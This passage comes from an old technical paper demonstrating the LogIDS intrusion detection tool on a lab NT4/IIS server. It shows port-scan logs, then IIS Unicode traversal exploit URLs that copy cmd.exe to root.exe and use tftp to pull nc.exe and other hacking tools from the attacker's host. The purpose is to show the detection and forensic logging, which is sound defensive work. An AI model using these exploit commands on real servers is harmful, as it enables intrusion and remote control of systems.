OK, now that we have looked at the ins and outs of LogIDS, let's see it in action. For this occasion, I decided to install myself a test machine configured with the following security measures: LogAgent 5.0 Pro (running as a service with the SIDTk 1.0 enabled), ComLog 1.05, Snort 1.9.1, ZoneAlarm Pro 2.6.362 and LogIDS 2.0 Open Source and Pro on top of it all, all of this running on a freshly installed NT4 SP6a partition. Oh yeah, I also installed IIS 4.0 default install, unpatched, for good measure (grin). No, seriously, what I wanted to do was to setup a vulnerable server subject to fall victim to the same kind of attack I performed in my paper "Autopsy of a successful intrusion (well, two actually)", which was the well-known UNICODE directory traversal vulnerability, along with copying some files that could lead me to further exploitation. As a matter of fact, with my current configuration, I had to specially configure ZoneAlarm so that the attack will perform without a problem, even if it was well monitored, as you will see. Let me recall, for those who haven't read my paper, that one of these intrusions, even if it went practically undetected by the security measures they had in place, some visual signs of our intrusion have been seen by staff members, and we (me and a colleague of the time) have even been caught during the act by a staff member as we have been reckless with a remote-GUI shell session. However, this whole incident went completely unreported until we produced our own report of our penetration testing contract. That is to say that too often, companies relies only a on couple of security gimmicks that provide a false sense of security, and on staff that is not properly trained to see a serious security breach when they have the chance to see one.
Like I said before, I see LogIDS as some kind of mega-IDS, as it benefits from the specificities of numerous security tools, to detect intrusions. One of the downside that traditional network-based intrusion detection systems are that they generate false results, which cause either undetected intrusions or false alerts that tends over time to lessen the level of attention dedicated to these alerts. Because LogIDS does not rely on a single intrusion detection technique, that means that the more illicit activity that is going on, the more log activity this will generate across your security architecture. By properly configuring your rules file, in order to separate the wheat from the chaff, you get a decent display (over which you have great control of the actual fields you actually care to see) to give you the information you need to understand what triggered the log, and with sound alerts properly set, when your monitoring console starts beeping like there's a fire, that'll be definitely a good hint that something wrong is going on.
So I started my little scenario attack by performing a simple port scan of my test machine TESTBED. ZoneAlarm and Snort immediately started to produce log data in their respective directory, under the watchful eye of LogAgent that diligently forwarded this precious cargo to the scrutiny of LogIDS. I used a slightly modified version of the rules and filters we have seen before, that you can find in the appendices, and it did the job remarkably for such a simple test. Under this conf, LogIDS started to display the data from these 2 log files in the appropriate windows (the window for the appropriate host, and the one for its associated subnet) frenetically, emitting a series of beeping sounds (note: it is recommended that you change your sound event wav files (Control Panel->Sound) to none for the Exclamation and Default events, so when a sound is emitted, it is from the PC speaker. This allows for better performance than wav playing) that should definitely alert anyone who is in hearing distance from the machine (my girlfriend thought that I just had a big bug that crashed the PC the first time she heard it when I was developing my app and feeding it with sample logs to trigger alerts). Figure 4. and 5. shows these windows under the scan.
Here is a very small sample of the logs collected from ZoneAlarm and Snort during this phase of the attack:
ZoneAlarm ZALog.txt file:
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:30 -4:00 GMT,10.0.0.1:0,10.0.0.2:0,ICMP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4552,10.0.0.2:21,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4553,10.0.0.2:22,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4554,10.0.0.2:23,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4556,10.0.0.2:42,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4557,10.0.0.2:53,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4558,10.0.0.2:69,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4559,10.0.0.2:79,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4561,10.0.0.2:110,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4562,10.0.0.2:111,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4564,10.0.0.2:143,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4565,10.0.0.2:1080,TCP
Snort's alert.ids file:
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:4,[**] [1:474:1] ICMP superscan echo [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:4,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:4,10/23-00:18:03.130388 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3C
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:4,10.0.0.1 -> 10.0.0.2 ICMP TTL:128 TOS:0x0 ID:40079 IpLen:20 DgmLen:36
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:4,Type:8 Code:0 ID:1024 Seq:512 ECHO
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:5,[**] [1:615:3] SCAN SOCKS Proxy attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:5,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:5,10/23-00:18:04.686272 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,10.0.0.1:4526 -> 10.0.0.2:1080 TCP TTL:128 TOS:0x0 ID:40105 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,******S* Seq: 0xE729533 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,TCP Options (4) => MSS: 1460 NOP NOP SackOK
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,[**] [1:620:2] SCAN Proxy (8080) attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,10/23-00:18:05.456182 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,10.0.0.1:4540 -> 10.0.0.2:8080 TCP TTL:128 TOS:0x0 ID:40119 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,******S* Seq: 0xE808BA9 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,TCP Options (4) => MSS: 1460 NOP NOP SackOK
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,[**] [1:615:3] SCAN SOCKS Proxy attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,10/23-00:18:07.619270 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,10.0.0.1:4526 -> 10.0.0.2:1080 TCP TTL:128 TOS:0x0 ID:40142 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,******S* Seq: 0xE729533 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,TCP Options (4) => MSS: 1460 NOP NOP SackOK
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,[**] [1:620:2] SCAN Proxy (8080) attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,10/23-00:18:08.419336 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,10.0.0.1:4540 -> 10.0.0.2:8080 TCP TTL:128 TOS:0x0 ID:40158 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,******S* Seq: 0xE808BA9 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,TCP Options (4) => MSS: 1460 NOP NOP SackOK
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,[**] [1:615:3] SCAN SOCKS Proxy attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,10/23-00:18:13.618979 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,10.0.0.1:4526 -> 10.0.0.2:1080 TCP TTL:128 TOS:0x0 ID:40183 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,******S* Seq: 0xE729533 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,TCP Options (4) => MSS: 1460 NOP NOP SackOK
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,[**] [1:620:2] SCAN Proxy (8080) attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,10/23-00:18:14.419263 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,10.0.0.1:4540 -> 10.0.0.2:8080 TCP TTL:128 TOS:0x0 ID:40199 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,******S* Seq: 0xE808BA9 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,TCP Options (4) => MSS: 1460 NOP NOP SackOK
And here's what snortlite.log digest produced by LogAgent 5.0 Pro looks like:
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:5, [1:474:1] ICMP superscan echo , Attempted Information Leak ,10/23,00:18:03.130388, 2 ,10.0.0.1,10.0.0.2,ICMP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:18:04.686272, 2 ,10.0.0.1:4526,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:18:05.456182, 2 ,10.0.0.1:4540,10.0.0.2:8080,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:18:07.619270, 2 ,10.0.0.1:4526,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:18:08.419336, 2 ,10.0.0.1:4540,10.0.0.2:8080,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:18:13.618979, 2 ,10.0.0.1:4526,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:32, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:18:14.419263, 2 ,10.0.0.1:4540,10.0.0.2:8080,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33, [1:474:1] ICMP superscan echo , Attempted Information Leak ,10/23,00:21:30.581990, 2 ,10.0.0.1,10.0.0.2,ICMP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:21:31.828234, 2 ,10.0.0.1:4565,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:35, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:21:32.598169, 2 ,10.0.0.1:4579,10.0.0.2:8080,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:35, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:21:34.752623, 2 ,10.0.0.1:4565,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:22:59, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:21:35.552538, 2 ,10.0.0.1:4579,10.0.0.2:8080,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:22:59, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:21:40.751327, 2 ,10.0.0.1:4565,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:22:59, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:21:41.551223, 2 ,10.0.0.1:4579,10.0.0.2:8080,TCP
As I said, besides showing intense activity for the related network items involved in the attack, LogIDS produced a series of sound that made it ring almost like an alarm bell. That should have got your attention. Now, here comes the rest of the attack. I passed to the UNICODE vulnerability right away, using tftp to place the tools nc.exe, hk2.exe, whoami.exe and pulist.exe in the \scripts folder of the web folder. I have done this by issuing a series of command to the server by using my web browser, by copying the command prompt (in fact ComLog binary) to the script folder under the name root.exe, as is common to see in worms or cracker behaviour. But first, I typed in a dir command, just to see if the attack works.
LogIDS 2.0 Pro supports clickable buttons under the action icons (limit of 32 items, I can easily program more if needed). Clicking on one of these buttons will open a bigger viewing window for the associated network item. All the windows are synchronized. Figure 7. will show you what happens when clicking on item 10.0.0.2.
So, the exploit seems to work very well, so now I can copy what the attacker thinks is cmd.exe (really ComLog) into root.exe for easier access:
http://10.0.0.2/scripts/..%c0%ad../winnt/system32/cmd.exe?/c+copy+\winnt\system32\cmd.exe+root.exe
ugmgifrj.clg (ComLog produces random-generated filenames to avoid detection by unsuspecting intruders):
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:16,Thu Oct 23 00:32:13 2003
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,Microsoft(R) Windows NT(TM)
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,(C) Copyright 1985-1996 Microsoft Corp.
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,Thu Oct 23 00:32:13 2003
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,D:/InetPub/scripts>Thu Oct 23 00:32:13 2003
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,copy /winnt/system32/cmd.exe root.exe
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,Thu Oct 23 00:32:14 2003
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,1 file(s) copied.
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,Thu Oct 23 00:32:14 2003
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,exit
which gives, when focus only on the 'line' field (note that ComLog adds timestamps at each command for easier forensics analysis):
Thu Oct 23 00:32:13 2003
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
Thu Oct 23 00:32:13 2003
D:/Inetpub/scripts>Thu Oct 23 00:32:13 2003
copy /winnt/system32/cmd.exe root.exe
Thu Oct 23 00:32:14 2003
1 file(s) copied.
Thu Oct 23 00:32:14 2003
exit
Such a log file exists, and have been taken into account by LogIDS, for each of the commands I supplied to download my tools (the next figures will show the rest of the attack from LogIDS ComLog textboxes perspective.). Just for forensics, such log files are invaluable, since this data was something previously not available in the analysis game, and determining the complete actions of an intruder on a machine could mean making complete hard disk analysis in order to try to identify the files he could have accessed, reverse-engineer downloaded binaries, etc. Now, you know exactly what happened, as it happened. Let's go further in our little test case.
The next step for me is to download some hacking tools. So I keep sending my commands by using urls like these ones:
http://10.0.0.2/scripts/root.exe?/c+tftp+-i+10.0.0.1+get+hk2.exe
http://10.0.0.2/scripts/root.exe?/c+tftp+-i+10.0.0.1+get+nc.exe
http://10.0.0.2/scripts/root.exe?/c+tftp+-i+10.0.0.1+get+whoami.exe
http://10.0.0.2/scripts/root.exe?/c+tftp+-i+10.0.0.1+get+pulist.exe
repeated for each files I want to download. I could have pursued this attack, but I think I proved my point and it would be useful to hack my poor server anymore. As you can see, besides detecting and reporting every command passed by the attacker, we are able to monitor the complete attack in its earliest stages. You can see the logs and the action icon of some modules from the SIDTk also reporting about some aspects of the attacks.
Here are some pieces of processes.log, from LogProc 1.0 (SITDk 1.0):
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:41:44,Unknown process detected,TFTP.EXE,D:\WINNT\system32\TFTP.EXE,
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:42:27,Unknown process detected,root.exe,D:\InetPub\scripts\root.exe,
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:42:27,Unknown process detected,TFTP.EXE,D:\WINNT\system32\TFTP.EXE,
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:42:47,Unknown process detected,root.exe,D:\InetPub\scripts\root.exe,
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:42:47,Unknown process detected,TFTP.EXE,D:\WINNT\system32\TFTP.EXE,
So at this point, I think we can classify this attack as definitely detected, I don't have to go further to prove my point, and we have details about it like never before, at the same time it happens. Don't forget that if you need to consult your logs afterwards, they will be located in the \logids\log\backup directory.
9. Version history
11. Conclusion